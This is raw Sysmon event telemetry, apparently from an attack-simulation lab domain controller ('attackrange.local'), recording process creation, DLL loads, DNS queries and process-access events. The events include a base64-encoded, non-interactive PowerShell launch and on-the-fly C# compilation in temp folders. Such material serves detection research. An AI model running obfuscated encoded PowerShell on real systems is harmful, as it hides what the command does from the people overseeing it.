19_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b31e56(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64) 154100x80000000000000003802Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.447{10ACEC4A-8585-5FCF-BE00-000000009101}4144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\342h1cqk\342h1cqk.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8583-5FCF-F6EB-060000000000}0x6ebf60HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{10ACEC4A-8584-5FCF-BD00-000000009101}1928C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG4AcwB0AGEAbABsAC0AUABhAGMAawBhAGcAZQBQAHIAbwB2AGkAZABlAHIAIAAtAE4AYQBtAGUAIABOAHUARwBlAHQAIAAtAE0AaQBuAGkAbQB1AG0AVgBlAHIAcwBpAG8AbgAgADIALgA4AC4ANQAuADIAMAAxACAALQBGAG8AcgBjAGUA 11241100x80000000000000003801Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.437{10ACEC4A-8584-5FCF-BD00-000000009101}1928C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\342h1cqk\342h1cqk.cmdline2020-12-08 13:54:13.437 11241100x80000000000000003800Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:13.437{10ACEC4A-8584-5FCF-BD00-000000009101}1928C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\342h1cqk\342h1cqk.dll2020-12-08 13:54:13.437 22542200x80000000000000003799Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.674{10ACEC4A-8581-5FCF-B200-000000009101}3136onegetcdn.azureedge.net0type: 5 onegetcdn.ec.azureedge.net;type: 5 cs9.wpc.v0cdn.net;::ffff:152.199.19.161;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 11241100x80000000000000003829Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:14.670{10ACEC4A-8584-5FCF-BD00-000000009101}1928C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Program Files\PackageManagement\ProviderAssemblies\nuget\2.8.5.208\Microsoft.PackageManagement.NuGetProvider.dll2020-12-08 13:54:14.670 11241100x80000000000000003955Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:15.981{10ACEC4A-8587-5FCF-C600-000000009101}4728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\xeo0comy.dll2020-12-08 13:54:15.872 10341000x80000000000000003954Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.981{10ACEC4A-8587-5FCF-C100-000000009101}46044492C:\Windows\system32\conhost.exe{10ACEC4A-8587-5FCF-C700-000000009101}4828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003953Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.981{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003952Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.981{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003951Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.981{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003950Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.981{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003949Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.981{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003948Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.981{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003947Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.981{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003946Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.981{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003945Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.981{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003944Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.981{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8587-5FCF-C700-000000009101}4828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003943Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.981{10ACEC4A-8587-5FCF-C600-000000009101}47282324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{10ACEC4A-8587-5FCF-C700-000000009101}4828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003942Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.981{10ACEC4A-8587-5FCF-C700-000000009101}4828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES339E.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC1F1456C2B6414FB78C92EF9A924EEEA6.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8587-5FCF-624B-070000000000}0x74b620HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{10ACEC4A-8587-5FCF-C600-000000009101}4728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\xeo0comy.cmdline" 10341000x80000000000000003941Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.888{10ACEC4A-8587-5FCF-C100-000000009101}46044492C:\Windows\system32\conhost.exe{10ACEC4A-8587-5FCF-C600-000000009101}4728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003940Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.888{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003939Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.888{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003938Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.888{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003937Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.888{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003936Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.888{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003935Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.888{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003934Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.888{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003933Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 